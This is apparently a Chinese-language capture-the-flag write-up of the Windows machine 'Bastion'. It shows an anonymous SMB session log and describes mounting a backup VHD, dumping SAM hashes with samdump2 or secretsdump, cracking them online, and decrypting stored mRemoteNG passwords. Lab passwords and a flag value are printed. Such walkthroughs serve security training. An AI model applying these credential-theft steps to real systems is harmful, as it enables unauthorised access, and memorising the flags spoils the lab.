环境介绍:
名称:Bastion
系统:Windows
信息搜集
获取目标
|
|


- 系统为
Windows Server,端口22、135、139、445开放,smb匿名`可访问。
shell获取
smb匿名登录
|
|

- 登录成功,有
Backups目录。
泄露文件下载
$ smbclient \\\\10.10.10.134\\Backups
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Nov 6 10:55:29 2019
.. D 0 Wed Nov 6 10:55:29 2019
kcbZGgrWCX D 0 Wed Nov 6 10:55:29 2019
nMQdJTlhbx D 0 Wed Nov 6 10:35:22 2019
note.txt AR 116 Tue Apr 16 18:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 20:43:08 2019
USfFGxhueP D 0 Tue Nov 5 16:58:09 2019
WindowsImageBackup D 0 Fri Feb 22 20:44:02 2019
7735807 blocks of size 4096. 2757383 blocks available
smb: \> cd WindowsImageBackup
smb: \WindowsImageBackup\> ls
. D 0 Fri Feb 22 20:44:02 2019
.. D 0 Fri Feb 22 20:44:02 2019
L4mpje-PC D 0 Fri Feb 22 20:45:32 2019
7735807 blocks of size 4096. 2757383 blocks available
smb: \WindowsImageBackup\> ls -la
NT_STATUS_NO_SUCH_FILE listing \WindowsImageBackup\-la
smb: \WindowsImageBackup\> dir
. D 0 Fri Feb 22 20:44:02 2019
.. D 0 Fri Feb 22 20:44:02 2019
L4mpje-PC D 0 Fri Feb 22 20:45:32 2019
7735807 blocks of size 4096. 2757383 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC
smb: \WindowsImageBackup\L4mpje-PC\> dir
. D 0 Fri Feb 22 20:45:32 2019
.. D 0 Fri Feb 22 20:45:32 2019
Backup 2019-02-22 124351 D 0 Fri Feb 22 20:45:32 2019
Catalog D 0 Fri Feb 22 20:45:32 2019
MediaId A 16 Fri Feb 22 20:44:02 2019
SPPMetadataCache
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"

- 匿名访问smb,发现一个
note.txt及WindowsImageBackup比较有意思,进入WindowsImageBackup目录发现有一个9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd虚拟机的备份文件。
smb 虚拟机文件挂载
|
|
- 首先安装
qemu-utils,然后将远程smb挂载到本地mnt目录。
密码搜寻
$ cd /mnt/vhd
$ ls
'$Recycle.Bin' pagefile.sys Recovery
autoexec.bat PerfLogs 'System Volume Information'
config.sys ProgramData Users
'Documents and Settings' 'Program Files' Windows
## root @ Nice in /mnt/vhd [11:28:30]
$ cd Windows/System32/config
## root @ Nice in /mnt/vhd/Windows/System32/config [11:29:50]
$ ls -la

- 进入挂载目录,搜集列表信息,寻找
sam及账户信息文件。
密码破解
hash 提取
|
|
- 将远程的密钥文件拷贝到本地,使用
samdump2或者secretsdump进行dump。获得Administrator、Guest、L4mpje的hash。
在线破解

- 使用
crackstation在线破解hash,得到密码bureaulampje。
flag1
|
|

l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\L4mpje\Desktop
22-02-2019 15:27 <DIR> .
22-02-2019 15:27 <DIR> ..
23-02-2019 09:07 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 11.293.966.336 bytes free
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfe57d5c3309db3a151772f9d86c6cd
l4mpje@BASTION C:\Users\L4mpje\Desktop>
- 通过
ssh登录成功并获得flag。
提权
系统信息搜集

- 发现装有
mRemoteNG。
漏洞枚举


mRemoteNG有一个本地配置文件可读取密码的漏洞。
密码枚举
|
|
- 使用解码脚本解码加密函数得到密码:
thXLHM96BeKL0ER2。
获得flag
|
|

- 通过ssh登录直接获得flag。
心得
很不错的windows渗透思路。